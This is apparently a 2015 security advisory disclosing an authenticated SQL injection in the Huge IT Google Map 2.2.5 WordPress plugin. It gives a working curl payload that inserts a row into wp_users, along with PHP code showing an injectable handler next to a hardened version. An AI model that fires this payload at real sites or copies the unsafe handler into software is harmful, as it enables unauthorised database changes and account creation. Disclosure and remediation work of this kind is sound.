Subject: SQL injection in Huge IT Google Map 2.2.5
Date: Wed, 8 Jul 2015 10:34:29 +0200

Hello,

Plugin: Huge IT Google Map 2.2.5 (https://wordpress.org/plugins/google-map-wp/)

Remote authenticated users can execute arbitrary SQL commands.

1. SQL injection (g_map_options_callback())

Method: POST
URL: http://localhost/wp-admin/admin-ajax.php?action=g_map_options
Vulnerable parameter: table

Example PHP callstack:
g_map_options_callback   [/google-map-wp/googlemap.php:487]
wpdb::query

Verification (inserting a new user into the database):

curl --cookie "..." --request POST --data "table=posts where id=-1; insert into wp_users values(NULL,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a);-- -" http://localhost/wp-admin/admin-ajax.php?action=g_map_options
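The root cause is a table name taken from the `table` POST parameter and spliced into the SQL string that reaches wpdb::query. The following is an added example written for this advisory, not the plugin's own code: the advisory does not reproduce googlemap.php:487, so the "before" handler is a reconstruction of the pattern, and the nonce name, the capability, the `id` parameter and the allowlisted table names are assumptions. The hardened handler keeps identifiers on a fixed allowlist (they cannot be bound as placeholders) and passes every value through `$wpdb->prepare()`.

```php
<?php
// Added example, not code from the Huge IT Google Map plugin.
// BEFORE: pattern that allows injection. The raw POST value is spliced into
// the SQL text and executed as-is (reconstruction of the reported pattern,
// not the plugin's actual line).
function g_map_options_callback_unsafe() {
    global $wpdb;
    $table = $_POST['table'];                                  // attacker-controlled
    $wpdb->query("SELECT * FROM {$wpdb->prefix}{$table}");     // injectable
}

// AFTER: verify nonce and capability, allowlist the identifier, bind values.
function g_map_options_callback_safe() {
    global $wpdb;

    // Only logged-in users with the right capability may reach this code.
    // 'g_map_options_nonce' and 'manage_options' are assumed names.
    check_ajax_referer('g_map_options_nonce', 'nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }

    // Table names cannot be bound with prepare(), so compare the request
    // against a fixed allowlist instead of trusting it. Entries are hypothetical.
    $allowed_tables = array('huge_it_maps', 'huge_it_markers');
    $requested = isset($_POST['table']) ? sanitize_key($_POST['table']) : '';
    if (!in_array($requested, $allowed_tables, true)) {
        wp_send_json_error('unknown table', 400);
    }
    $table = $wpdb->prefix . $requested;

    // Any value (here an assumed numeric `id`) goes through prepare() as a
    // placeholder; the "posts where id=-1; insert ..." payload can no longer
    // change the query's structure.
    $id = isset($_POST['id']) ? absint($_POST['id']) : 0;
    $rows = $wpdb->get_results(
        $wpdb->prepare("SELECT * FROM `{$table}` WHERE id = %d", $id),
        ARRAY_A
    );
    wp_send_json_success($rows);
}
add_action('wp_ajax_g_map_options', 'g_map_options_callback_safe');
```

With the allowlist in place, a request whose `table` value is not one of the known names is rejected with HTTP 400 before any SQL is built, and the nonce check stops the action from being triggered cross-site even for a logged-in administrator.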


--
Regards,
Marcin Probola,